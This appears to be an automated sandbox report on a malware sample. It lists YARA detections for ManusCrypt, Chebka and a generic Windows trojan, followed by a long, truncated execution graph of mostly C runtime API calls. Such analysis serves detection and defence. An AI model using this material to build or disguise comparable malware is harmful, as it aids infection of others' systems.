                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000025.00000003.432969413.0000012DBC4A0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000025.00000003.432969413.0000012DBC4A0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:42
                                                          Start time:10:18:29
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\wbem\WMIADAP.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wmiadap.exe /F /T /R
                                                          Imagebase:0x7ff68bd80000
                                                          File size:177664 bytes
                                                          MD5 hash:9783D0765F31980950445DFD40DB15DA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:5.6%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:7.6%
                                                            Total number of Nodes:1625
                                                            Total number of Limit Nodes:50
                                                            execution_graph 6290 40bd40 6291 401160 2 API calls 6290->6291 6292 40bd52 6291->6292 6293 4017bc __cinit 76 API calls 6292->6293 6294 40bd5c 6293->6294 6771 40bd00 6772 40b130 6 API calls 6771->6772 6773 40bd0d GetProcAddress 6772->6773 6835 40bdc0 VariantClear 6295 406448 RtlUnwind 6836 407dc8 SetUnhandledExceptionFilter 6837 402fdf __encode_pointer 5 API calls 6836->6837 6838 407dd9 6837->6838 6900 407f88 6903 407e0d 6900->6903 6904 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 6903->6904 6905 407e1f 6904->6905 6912 4077f6 6905->6912 6907 407e2b 6908 407e3f 6907->6908 6916 407060 6907->6916 6910 4077f6 __forcdecpt_l 104 API calls 6908->6910 6911 407e48 6910->6911 6913 40780f 6912->6913 6914 4077ff 6912->6914 6921 4076df 6913->6921 6914->6907 6917 407069 6916->6917 6918 40707b 6916->6918 6917->6907 6985 407011 6918->6985 6922 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 6921->6922 6923 4076f2 6922->6923 6924 407752 6923->6924 6925 4076fe 6923->6925 6928 407175 __isleadbyte_l 79 API calls 6924->6928 6929 407777 6924->6929 6927 4073d5 __isctype_l 93 API calls 6925->6927 6931 407716 6925->6931 6926 401b5b __cftof_l 69 API calls 6930 40777d 6926->6930 6927->6931 6928->6929 6929->6926 6929->6930 6933 406ed2 6930->6933 6931->6914 6934 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 6933->6934 6935 406ee3 6934->6935 6938 406b30 6935->6938 6939 406b4f LCMapStringW 6938->6939 6943 406b6a 6938->6943 6940 406b72 GetLastError 6939->6940 6939->6943 6940->6943 6941 406d67 6945 4071dc __crtLCMapStringA_stat 93 API calls 6941->6945 6942 406bc4 6944 406bdd MultiByteToWideChar 6942->6944 6966 406d5e 6942->6966 6943->6941 6943->6942 6952 406c0a 6944->6952 6944->6966 6947 406d8f 6945->6947 6946 40158c __cftof_l 5 API calls 6948 406ed0 6946->6948 6949 406e83 LCMapStringA 6947->6949 6950 406da8 6947->6950 6947->6966 6948->6931 6984 406ddf 6949->6984 6953 407223 ___convertcp 76 API calls 6950->6953 6951 406c5b MultiByteToWideChar 6954 406c74 LCMapStringW 6951->6954 6955 406d55 6951->6955 6957 405918 _malloc 69 API calls 6952->6957 6964 406c23 __alloca_probe_16 6952->6964 6958 406dba 6953->6958 6954->6955 6960 406c95 6954->6960 6959 406895 __freea 69 API calls 6955->6959 6956 406eaa 6965 40159b __getptd_noexit 69 API calls 6956->6965 6956->6966 6957->6964 6962 406dc4 LCMapStringA 6958->6962 6958->6966 6959->6966 6963 406c9d 6960->6963 6970 406cc6 6960->6970 6961 40159b __getptd_noexit 69 API calls 6961->6956 6968 406de6 6962->6968 6962->6984 6963->6955 6967 406caf LCMapStringW 6963->6967 6964->6951 6964->6966 6965->6966 6966->6946 6967->6955 6971 406df7 _memset __alloca_probe_16 6968->6971 6973 405918 _malloc 69 API calls 6968->6973 6969 406d15 LCMapStringW 6974 406d2d WideCharToMultiByte 6969->6974 6975 406d4f 6969->6975 6972 405918 _malloc 69 API calls 6970->6972 6976 406ce1 __alloca_probe_16 6970->6976 6977 406e35 LCMapStringA 6971->6977 6971->6984 6972->6976 6973->6971 6974->6975 6978 406895 __freea 69 API calls 6975->6978 6976->6955 6976->6969 6979 406e51 6977->6979 6980 406e55 6977->6980 6978->6955 6983 406895 __freea 69 API calls 6979->6983 6982 407223 ___convertcp 76 API calls 6980->6982 6982->6979 6983->6984 6984->6956 6984->6961 6986 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 6985->6986 6987 407022 6986->6987 6988 4073d5 __isctype_l 93 API calls 6987->6988 6989 40703c 6987->6989 6988->6989 6989->6907 6990 40798e GetThreadLocale GetLocaleInfoA 6991 4079dc GetACP 6990->6991 6992 4079bd 6990->6992 6993 4079e4 6991->6993 6992->6991 6992->6993 6994 40158c __cftof_l 5 API calls 6993->6994 6995 4079f1 6994->6995 6839 4045cf InitializeCriticalSection 6996 40bd90 6997 4017bc __cinit 76 API calls 6996->6997 6998 40bd9a 6997->6998 6296 401751 6297 403552 __calloc_crt 69 API calls 6296->6297 6298 40175b 6297->6298 6299 402fdf __encode_pointer 5 API calls 6298->6299 6300 401763 6299->6300 6774 401a12 6777 404529 6774->6777 6776 401a17 6776->6776 6778 404559 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 6777->6778 6779 40454c 6777->6779 6780 404550 6778->6780 6779->6778 6779->6780 6780->6776 6301 407f54 6304 407f14 6301->6304 6305 407f25 6304->6305 6306 407f3e 6304->6306 6310 40898d 6305->6310 6317 408a33 6306->6317 6309 407f2e 6324 40546a 6310->6324 6314 4089c9 __ld12tod 6315 40158c __cftof_l 5 API calls 6314->6315 6316 408a31 6315->6316 6316->6309 6318 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 6317->6318 6319 408a57 6318->6319 6320 4098cd ___strgtold12_l 69 API calls 6319->6320 6321 408a6f __ld12tod 6320->6321 6322 40158c __cftof_l 5 API calls 6321->6322 6323 408ad7 6322->6323 6323->6309 6325 405479 6324->6325 6331 4054c6 6324->6331 6342 403255 6325->6342 6328 4054a6 6328->6331 6362 4053c6 6328->6362 6332 4098cd 6331->6332 6333 409916 6332->6333 6339 409935 6332->6339 6334 401b5b __cftof_l 69 API calls 6333->6334 6335 40991b 6334->6335 6336 402fbb __cftof_l 5 API calls 6335->6336 6341 40992b 6336->6341 6337 40158c __cftof_l 5 API calls 6338 409f5c 6337->6338 6338->6314 6339->6341 6550 40ac8a 6339->6550 6341->6337 6343 4031d2 __getptd_noexit 69 API calls 6342->6343 6344 40325b 6343->6344 6345 403268 6344->6345 6346 403688 __amsg_exit 69 API calls 6344->6346 6345->6328 6347 405142 6345->6347 6346->6345 6348 40514e _doexit 6347->6348 6349 403255 _LocaleUpdate::_LocaleUpdate 69 API calls 6348->6349 6350 405153 6349->6350 6351 405181 6350->6351 6353 405165 6350->6353 6352 401d99 __lock 69 API calls 6351->6352 6354 405188 6352->6354 6355 403255 _LocaleUpdate::_LocaleUpdate 69 API calls 6353->6355 6378 405104 6354->6378 6359 40516a 6355->6359 6360 405178 _doexit 6359->6360 6361 403688 __amsg_exit 69 API calls 6359->6361 6360->6328 6361->6360 6363 4053d2 _doexit 6362->6363 6364 403255 _LocaleUpdate::_LocaleUpdate 69 API calls 6363->6364 6365 4053d7 6364->6365 6366 401d99 __lock 69 API calls 6365->6366 6367 4053e9 6365->6367 6368 405407 6366->6368 6370 4053f7 _doexit 6367->6370 6374 403688 __amsg_exit 69 API calls 6367->6374 6369 405450 6368->6369 6371 405438 InterlockedIncrement 6368->6371 6372 40541e InterlockedDecrement 6368->6372 6546 405461 6369->6546 6370->6331 6371->6369 6372->6371 6375 405429 6372->6375 6374->6370 6375->6371 6376 40159b __getptd_noexit 69 API calls 6375->6376 6377 405437 6376->6377 6377->6371 6379 405108 6378->6379 6380 40513a 6378->6380 6379->6380 6381 404ff2 ___addlocaleref 8 API calls 6379->6381 6386 4051ac 6380->6386 6382 40511b 6381->6382 6382->6380 6389 405078 6382->6389 6545 401cc1 LeaveCriticalSection 6386->6545 6388 4051b3 6388->6359 6390 405100 6389->6390 6391 405081 InterlockedDecrement 6389->6391 6390->6380 6403 404eb2 6390->6403 6392 405097 InterlockedDecrement 6391->6392 6393 40509a 6391->6393 6392->6393 6394 4050a4 InterlockedDecrement 6393->6394 6395 4050a7 6393->6395 6394->6395 6396 4050b1 InterlockedDecrement 6395->6396 6397 4050b4 6395->6397 6396->6397 6398 4050c1 6397->6398 6399 4050be InterlockedDecrement 6397->6399 6400 4050d6 InterlockedDecrement 6398->6400 6401 4050e6 InterlockedDecrement 6398->6401 6402 4050ef InterlockedDecrement 6398->6402 6399->6398 6400->6398 6401->6398 6402->6390 6404 404f33 6403->6404 6410 404ec6 6403->6410 6405 40159b __getptd_noexit 69 API calls 6404->6405 6406 404f80 6404->6406 6408 404f54 6405->6408 6419 404fa7 6406->6419 6457 40663c 6406->6457 6413 40159b __getptd_noexit 69 API calls 6408->6413 6410->6404 6411 404efa 6410->6411 6415 40159b __getptd_noexit 69 API calls 6410->6415 6412 404f1b 6411->6412 6422 40159b __getptd_noexit 69 API calls 6411->6422 6418 40159b __getptd_noexit 69 API calls 6412->6418 6417 404f67 6413->6417 6414 40159b __getptd_noexit 69 API calls 6414->6419 6420 404eef 6415->6420 6416 404fe6 6421 40159b __getptd_noexit 69 API calls 6416->6421 6423 40159b __getptd_noexit 69 API calls 6417->6423 6425 404f28 6418->6425 6419->6416 6424 40159b 69 API calls __getptd_noexit 6419->6424 6433 40680c 6420->6433 6428 404fec 6421->6428 6429 404f10 6422->6429 6430 404f75 6423->6430 6424->6419 6426 40159b __getptd_noexit 69 API calls 6425->6426 6426->6404 6428->6380 6449 4067cc 6429->6449 6432 40159b __getptd_noexit 69 API calls 6430->6432 6432->6406 6434 406815 6433->6434 6448 406892 6433->6448 6435 406826 6434->6435 6436 40159b __getptd_noexit 69 API calls 6434->6436 6437 406838 6435->6437 6438 40159b __getptd_noexit 69 API calls 6435->6438 6436->6435 6439 40159b __getptd_noexit 69 API calls 6437->6439 6440 40684a 6437->6440 6438->6437 6439->6440 6441 40159b __getptd_noexit 69 API calls 6440->6441 6442 40685c 6440->6442 6441->6442 6443 40159b __getptd_noexit 69 API calls 6442->6443 6445 40686e 6442->6445 6443->6445 6444 406880 6447 40159b __getptd_noexit 69 API calls 6444->6447 6444->6448 6445->6444 6446 40159b __getptd_noexit 69 API calls 6445->6446 6446->6444 6447->6448 6448->6411 6450 4067d5 6449->6450 6456 406809 6449->6456 6451 4067e5 6450->6451 6452 40159b __getptd_noexit 69 API calls 6450->6452 6453 40159b __getptd_noexit 69 API calls 6451->6453 6454 4067f7 6451->6454 6452->6451 6453->6454 6455 40159b __getptd_noexit 69 API calls 6454->6455 6454->6456 6455->6456 6456->6412 6458 406649 6457->6458 6544 404fa0 6457->6544 6459 40159b __getptd_noexit 69 API calls 6458->6459 6460 406651 6459->6460 6461 40159b __getptd_noexit 69 API calls 6460->6461 6462 406659 6461->6462 6463 40159b __getptd_noexit 69 API calls 6462->6463 6464 406661 6463->6464 6465 40159b __getptd_noexit 69 API calls 6464->6465 6466 406669 6465->6466 6467 40159b __getptd_noexit 69 API calls 6466->6467 6468 406671 6467->6468 6469 40159b __getptd_noexit 69 API calls 6468->6469 6470 406679 6469->6470 6471 40159b __getptd_noexit 69 API calls 6470->6471 6472 406680 6471->6472 6473 40159b __getptd_noexit 69 API calls 6472->6473 6474 406688 6473->6474 6475 40159b __getptd_noexit 69 API calls 6474->6475 6476 406690 6475->6476 6477 40159b __getptd_noexit 69 API calls 6476->6477 6478 406698 6477->6478 6479 40159b __getptd_noexit 69 API calls 6478->6479 6480 4066a0 6479->6480 6481 40159b __getptd_noexit 69 API calls 6480->6481 6482 4066a8 6481->6482 6483 40159b __getptd_noexit 69 API calls 6482->6483 6484 4066b0 6483->6484 6485 40159b __getptd_noexit 69 API calls 6484->6485 6486 4066b8 6485->6486 6487 40159b __getptd_noexit 69 API calls 6486->6487 6488 4066c0 6487->6488 6489 40159b __getptd_noexit 69 API calls 6488->6489 6490 4066c8 6489->6490 6491 40159b __getptd_noexit 69 API calls 6490->6491 6492 4066d3 6491->6492 6493 40159b __getptd_noexit 69 API calls 6492->6493 6494 4066db 6493->6494 6495 40159b __getptd_noexit 69 API calls 6494->6495 6496 4066e3 6495->6496 6497 40159b __getptd_noexit 69 API calls 6496->6497 6498 4066eb 6497->6498 6499 40159b __getptd_noexit 69 API calls 6498->6499 6500 4066f3 6499->6500 6501 40159b __getptd_noexit 69 API calls 6500->6501 6502 4066fb 6501->6502 6503 40159b __getptd_noexit 69 API calls 6502->6503 6504 406703 6503->6504 6505 40159b __getptd_noexit 69 API calls 6504->6505 6506 40670b 6505->6506 6507 40159b __getptd_noexit 69 API calls 6506->6507 6508 406713 6507->6508 6509 40159b __getptd_noexit 69 API calls 6508->6509 6510 40671b 6509->6510 6511 40159b __getptd_noexit 69 API calls 6510->6511 6512 406723 6511->6512 6513 40159b __getptd_noexit 69 API calls 6512->6513 6514 40672b 6513->6514 6515 40159b __getptd_noexit 69 API calls 6514->6515 6516 406733 6515->6516 6517 40159b __getptd_noexit 69 API calls 6516->6517 6518 40673b 6517->6518 6519 40159b __getptd_noexit 69 API calls 6518->6519 6520 406743 6519->6520 6521 40159b __getptd_noexit 69 API calls 6520->6521 6522 40674b 6521->6522 6523 40159b __getptd_noexit 69 API calls 6522->6523 6524 406759 6523->6524 6525 40159b __getptd_noexit 69 API calls 6524->6525 6526 406764 6525->6526 6527 40159b __getptd_noexit 69 API calls 6526->6527 6528 40676f 6527->6528 6529 40159b __getptd_noexit 69 API calls 6528->6529 6530 40677a 6529->6530 6531 40159b __getptd_noexit 69 API calls 6530->6531 6532 406785 6531->6532 6533 40159b __getptd_noexit 69 API calls 6532->6533 6534 406790 6533->6534 6535 40159b __getptd_noexit 69 API calls 6534->6535 6536 40679b 6535->6536 6537 40159b __getptd_noexit 69 API calls 6536->6537 6538 4067a6 6537->6538 6539 40159b __getptd_noexit 69 API calls 6538->6539 6540 4067b1 6539->6540 6541 40159b __getptd_noexit 69 API calls 6540->6541 6542 4067bc 6541->6542 6543 40159b __getptd_noexit 69 API calls 6542->6543 6543->6544 6544->6414 6545->6388 6549 401cc1 LeaveCriticalSection 6546->6549 6548 405468 6548->6367 6549->6548 6551 40acba 6550->6551 6552 40158c __cftof_l 5 API calls 6551->6552 6553 40ae54 6552->6553 6553->6341 6840 4019d4 6843 403c61 6840->6843 6844 4031d2 __getptd_noexit 69 API calls 6843->6844 6845 403c6c 6844->6845 6846 403c72 UnhandledExceptionFilter 6845->6846 6847 403c80 6845->6847 6849 4019e5 6846->6849 6848 403cc2 UnhandledExceptionFilter 6847->6848 6847->6849 6848->6849 6781 406f15 6782 403688 __amsg_exit 69 API calls 6781->6782 6783 406f1c 6782->6783 6999 407f96 7002 407e7e 6999->7002 7003 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 7002->7003 7004 407e90 7003->7004 6554 405d57 6555 405d5a 6554->6555 6558 406f1e 6555->6558 6557 405d66 _doexit 6559 406f43 6558->6559 6560 406f4a 6558->6560 6561 403a88 __NMSG_WRITE 69 API calls 6559->6561 6574 405dca 6560->6574 6561->6560 6564 406f5b _memset 6566 407009 6564->6566 6568 406fde SetUnhandledExceptionFilter UnhandledExceptionFilter 6564->6568 6598 403915 6566->6598 6568->6566 6570 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 6571 407022 6570->6571 6572 40703c 6571->6572 6601 4073d5 6571->6601 6572->6557 6575 40304b __decode_pointer 5 API calls 6574->6575 6576 405dd5 6575->6576 6576->6564 6577 405dd7 6576->6577 6580 405de3 _doexit 6577->6580 6578 405e3f 6579 405e20 6578->6579 6584 405e4e 6578->6584 6583 40304b __decode_pointer 5 API calls 6579->6583 6580->6578 6580->6579 6581 405e0a 6580->6581 6585 405e06 6580->6585 6582 4031d2 __getptd_noexit 69 API calls 6581->6582 6586 405e0f _siglookup 6582->6586 6583->6586 6587 401b5b __cftof_l 69 API calls 6584->6587 6585->6581 6585->6584 6590 405eb5 6586->6590 6591 403915 _abort 69 API calls 6586->6591 6597 405e18 _doexit 6586->6597 6588 405e53 6587->6588 6589 402fbb __cftof_l 5 API calls 6588->6589 6589->6597 6592 401d99 __lock 69 API calls 6590->6592 6593 405ec0 6590->6593 6591->6590 6592->6593 6594 403042 ___crtMessageBoxA 5 API calls 6593->6594 6595 405ef5 6593->6595 6594->6595 6608 405f4b 6595->6608 6597->6564 6599 403836 _doexit 69 API calls 6598->6599 6600 403922 6599->6600 6600->6570 6602 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 6601->6602 6603 4073e7 6602->6603 6607 4073f4 6603->6607 6613 407175 6603->6613 6607->6572 6609 405f51 6608->6609 6610 405f58 6608->6610 6612 401cc1 LeaveCriticalSection 6609->6612 6610->6597 6612->6610 6614 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 6613->6614 6615 407186 6614->6615 6616 406aae 6615->6616 6617 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 6616->6617 6618 406abf 6617->6618 6621 4068f6 6618->6621 6622 406915 GetStringTypeW 6621->6622 6623 406940 6621->6623 6624 406935 GetLastError 6622->6624 6625 40692d 6622->6625 6623->6625 6626 406a27 6623->6626 6624->6623 6627 406979 MultiByteToWideChar 6625->6627 6643 406a21 6625->6643 6649 4071dc GetLocaleInfoA 6626->6649 6633 4069a6 6627->6633 6627->6643 6629 40158c __cftof_l 5 API calls 6631 406aac 6629->6631 6631->6607 6632 406a78 GetStringTypeA 6638 406a93 6632->6638 6632->6643 6634 4069bb _memset __alloca_probe_16 6633->6634 6635 405918 _malloc 69 API calls 6633->6635 6637 4069f4 MultiByteToWideChar 6634->6637 6634->6643 6635->6634 6641 406a0a GetStringTypeW 6637->6641 6642 406a1b 6637->6642 6639 40159b __getptd_noexit 69 API calls 6638->6639 6639->6643 6641->6642 6645 406895 6642->6645 6643->6629 6646 40689d 6645->6646 6647 4068ae 6645->6647 6646->6647 6648 40159b __getptd_noexit 69 API calls 6646->6648 6647->6643 6648->6647 6650 40720d 6649->6650 6652 407208 6649->6652 6680 407164 6650->6680 6653 40158c __cftof_l 5 API calls 6652->6653 6654 406a4b 6653->6654 6654->6632 6654->6643 6655 407223 6654->6655 6656 4072eb 6655->6656 6657 407261 GetCPInfo 6655->6657 6660 40158c __cftof_l 5 API calls 6656->6660 6658 4072d6 MultiByteToWideChar 6657->6658 6659 407278 6657->6659 6658->6656 6664 407291 _strlen 6658->6664 6659->6658 6661 40727e GetCPInfo 6659->6661 6662 406a6c 6660->6662 6661->6658 6663 40728b 6661->6663 6662->6632 6662->6643 6663->6658 6663->6664 6665 405918 _malloc 69 API calls 6664->6665 6669 4072c3 _memset __alloca_probe_16 6664->6669 6665->6669 6666 407320 MultiByteToWideChar 6667 407357 6666->6667 6668 407338 6666->6668 6670 406895 __freea 69 API calls 6667->6670 6671 40735c 6668->6671 6672 40733f WideCharToMultiByte 6668->6672 6669->6656 6669->6666 6670->6656 6673 407367 WideCharToMultiByte 6671->6673 6674 40737b 6671->6674 6672->6667 6673->6667 6673->6674 6675 403552 __calloc_crt 69 API calls 6674->6675 6676 407383 6675->6676 6676->6667 6677 40738c WideCharToMultiByte 6676->6677 6677->6667 6678 40739e 6677->6678 6679 40159b __getptd_noexit 69 API calls 6678->6679 6679->6667 6683 4076b6 6680->6683 6684 4076cd 6683->6684 6687 40748b 6684->6687 6688 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 6687->6688 6690 40749e 6688->6690 6689 4074b0 6691 401b5b __cftof_l 69 API calls 6689->6691 6690->6689 6695 4074ed 6690->6695 6692 4074b5 6691->6692 6693 402fbb __cftof_l 5 API calls 6692->6693 6697 407171 6693->6697 6694 4073d5 __isctype_l 93 API calls 6694->6695 6695->6694 6696 407532 6695->6696 6696->6697 6698 401b5b __cftof_l 69 API calls 6696->6698 6697->6652 6698->6697 5333 405918 5334 4059c5 5333->5334 5341 405926 5333->5341 5335 405fa5 _malloc 5 API calls 5334->5335 5337 4059cb 5335->5337 5336 40593b 5336->5341 5352 403c28 5336->5352 5361 403a88 5336->5361 5395 4036d2 5336->5395 5339 401b5b __cftof_l 68 API calls 5337->5339 5340 4059d1 5339->5340 5341->5336 5344 405989 RtlAllocateHeap 5341->5344 5346 4059b0 5341->5346 5349 4059ae 5341->5349 5351 4059bc 5341->5351 5398 4058c9 5341->5398 5406 405fa5 5341->5406 5344->5341 5409 401b5b 5346->5409 5350 401b5b __cftof_l 68 API calls 5349->5350 5350->5351 5412 40637d 5352->5412 5355 40637d __NMSG_WRITE 69 API calls 5357 403c3c 5355->5357 5356 403a88 __NMSG_WRITE 69 API calls 5358 403c54 5356->5358 5357->5356 5359 403c5e 5357->5359 5360 403a88 __NMSG_WRITE 69 API calls 5358->5360 5359->5336 5360->5359 5362 403a94 5361->5362 5363 40637d __NMSG_WRITE 66 API calls 5362->5363 5394 403bea 5362->5394 5364 403ab4 5363->5364 5365 403bef GetStdHandle 5364->5365 5366 40637d __NMSG_WRITE 66 API calls 5364->5366 5367 403bfd _strlen 5365->5367 5365->5394 5369 403ac5 5366->5369 5370 403c17 WriteFile 5367->5370 5367->5394 5368 403ad7 5368->5394 5431 405fc7 5368->5431 5369->5365 5369->5368 5370->5394 5373 403b0d GetModuleFileNameA 5375 403b2b 5373->5375 5380 403b4e _strlen 5373->5380 5377 405fc7 _strcpy_s 66 API calls 5375->5377 5378 403b3b 5377->5378 5378->5380 5381 402ebf __invoke_watson 10 API calls 5378->5381 5379 403b91 5456 406259 5379->5456 5380->5379 5447 4062ca 5380->5447 5381->5380 5386 403bb5 5388 406259 _strcat_s 66 API calls 5386->5388 5387 402ebf __invoke_watson 10 API calls 5387->5386 5389 403bc6 5388->5389 5391 403bd7 5389->5391 5392 402ebf __invoke_watson 10 API calls 5389->5392 5390 402ebf __invoke_watson 10 API calls 5390->5379 5465 4060bb 5391->5465 5392->5391 5394->5336 5539 4036ac GetModuleHandleA 5395->5539 5399 4058d5 _doexit 5398->5399 5400 405906 _doexit 5399->5400 5543 401d99 5399->5543 5400->5341 5402 4058eb 5550 4025e6 5402->5550 5407 40304b __decode_pointer 5 API calls 5406->5407 5408 405fb0 5407->5408 5408->5341 5673 4031d2 GetLastError 5409->5673 5411 401b60 5411->5349 5413 406388 5412->5413 5414 401b5b __cftof_l 69 API calls 5413->5414 5415 403c2f 5413->5415 5416 4063ab 5414->5416 5415->5355 5415->5357 5419 402fbb 5416->5419 5422 40304b TlsGetValue 5419->5422 5421 402fc9 __invoke_watson 5423 40305e 5422->5423 5424 40307f GetModuleHandleA 5422->5424 5423->5424 5425 403068 TlsGetValue 5423->5425 5426 4030a8 5424->5426 5427 40308e GetProcAddress 5424->5427 5429 403073 5425->5429 5426->5421 5428 403077 5427->5428 5428->5426 5430 40309e RtlDecodePointer 5428->5430 5429->5424 5429->5428 5430->5426 5432 405fd4 5431->5432 5435 405fdc 5431->5435 5432->5435 5438 406003 5432->5438 5433 401b5b __cftof_l 69 API calls 5434 405fe1 5433->5434 5436 402fbb __cftof_l 5 API calls 5434->5436 5435->5433 5437 403af9 5436->5437 5437->5373 5440 402ebf 5437->5440 5438->5437 5439 401b5b __cftof_l 69 API calls 5438->5439 5439->5434 5502 402ad0 5440->5502 5442 402f50 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5443 402f93 GetCurrentProcess TerminateProcess 5442->5443 5444 402f87 __invoke_watson 5442->5444 5504 40158c 5443->5504 5444->5443 5446 402fb3 5446->5373 5452 4062da 5447->5452 5448 4062de 5449 401b5b __cftof_l 69 API calls 5448->5449 5450 403b7e 5448->5450 5451 4062fa 5449->5451 5450->5379 5450->5390 5453 402fbb __cftof_l 5 API calls 5451->5453 5452->5448 5452->5450 5454 406324 5452->5454 5453->5450 5454->5450 5455 401b5b __cftof_l 69 API calls 5454->5455 5455->5451 5457 40626e 5456->5457 5460 406266 5456->5460 5458 401b5b __cftof_l 69 API calls 5457->5458 5459 406273 5458->5459 5461 402fbb __cftof_l 5 API calls 5459->5461 5460->5457 5462 4062a3 5460->5462 5463 403ba4 5461->5463 5462->5463 5464 401b5b __cftof_l 69 API calls 5462->5464 5463->5386 5463->5387 5464->5459 5513 403042 5465->5513 5468 40618a 5472 406209 5468->5472 5475 40304b __decode_pointer 5 API calls 5468->5475 5469 4060e3 LoadLibraryA 5470 4060f4 5469->5470 5471 4060fb GetProcAddress 5469->5471 5470->5394 5471->5470 5473 40610d 5471->5473 5477 40304b __decode_pointer 5 API calls 5472->5477 5496 4061ee 5472->5496 5516 402fdf TlsGetValue 5473->5516 5479 4061aa 5475->5479 5476 40304b __decode_pointer 5 API calls 5476->5470 5484 406218 5477->5484 5483 4061d6 5479->5483 5487 40304b __decode_pointer 5 API calls 5479->5487 5480 402fdf __encode_pointer 5 API calls 5481 406128 GetProcAddress 5480->5481 5482 402fdf __encode_pointer 5 API calls 5481->5482 5486 40613d 5482->5486 5532 403768 5483->5532 5488 40304b __decode_pointer 5 API calls 5484->5488 5484->5496 5525 403731 5486->5525 5491 4061c9 5487->5491 5488->5496 5489 4061df 5493 402ebf __invoke_watson 10 API calls 5489->5493 5489->5496 5491->5472 5491->5483 5492 40614b 5494 40615b 5492->5494 5497 402ebf __invoke_watson 10 API calls 5492->5497 5493->5496 5494->5468 5495 406164 GetProcAddress 5494->5495 5498 402fdf __encode_pointer 5 API calls 5495->5498 5496->5476 5497->5494 5499 406172 5498->5499 5499->5468 5500 40617c GetProcAddress 5499->5500 5501 402fdf __encode_pointer 5 API calls 5500->5501 5501->5468 5503 402adc __VEC_memzero 5502->5503 5503->5442 5505 401594 5504->5505 5506 401596 IsDebuggerPresent 5504->5506 5505->5446 5512 4045bd 5506->5512 5509 401ae7 SetUnhandledExceptionFilter UnhandledExceptionFilter 5510 401b0c GetCurrentProcess TerminateProcess 5509->5510 5511 401b04 __invoke_watson 5509->5511 5510->5446 5511->5510 5512->5509 5514 402fdf __encode_pointer 5 API calls 5513->5514 5515 403049 5514->5515 5515->5468 5515->5469 5517 402ff2 5516->5517 5518 403013 GetModuleHandleA 5516->5518 5517->5518 5519 402ffc TlsGetValue 5517->5519 5520 403022 GetProcAddress 5518->5520 5521 40303c GetProcAddress 5518->5521 5524 403007 5519->5524 5522 40300b 5520->5522 5521->5480 5522->5521 5523 403032 RtlEncodePointer 5522->5523 5523->5521 5524->5518 5524->5522 5526 40373c 5525->5526 5527 403762 5526->5527 5528 401b5b __cftof_l 69 API calls 5526->5528 5527->5492 5529 403741 5528->5529 5530 402fbb __cftof_l 5 API calls 5529->5530 5531 403751 5530->5531 5531->5492 5533 403773 5532->5533 5534 401b5b __cftof_l 69 API calls 5533->5534 5535 403798 5533->5535 5536 403778 5534->5536 5535->5489 5537 402fbb __cftof_l 5 API calls 5536->5537 5538 403788 5537->5538 5538->5489 5540 4036d1 ExitProcess 5539->5540 5541 4036bb GetProcAddress 5539->5541 5541->5540 5542 4036cb 5541->5542 5542->5540 5544 401dac 5543->5544 5545 401dbf EnterCriticalSection 5543->5545 5559 401cd6 5544->5559 5545->5402 5547 401db2 5547->5545 5585 403688 5547->5585 5553 402612 5550->5553 5551 4026ab 5555 4026b4 5551->5555 5668 402201 5551->5668 5553->5551 5553->5555 5661 402151 5553->5661 5556 40590f 5555->5556 5672 401cc1 LeaveCriticalSection 5556->5672 5558 405916 5558->5400 5560 401ce2 _doexit 5559->5560 5561 401d08 5560->5561 5562 403c28 __FF_MSGBANNER 69 API calls 5560->5562 5567 401d18 _doexit 5561->5567 5592 403512 5561->5592 5563 401cf7 5562->5563 5565 403a88 __NMSG_WRITE 69 API calls 5563->5565 5568 401cfe 5565->5568 5566 401d23 5569 401d39 5566->5569 5570 401d2a 5566->5570 5567->5547 5573 4036d2 _malloc 3 API calls 5568->5573 5572 401d99 __lock 69 API calls 5569->5572 5571 401b5b __cftof_l 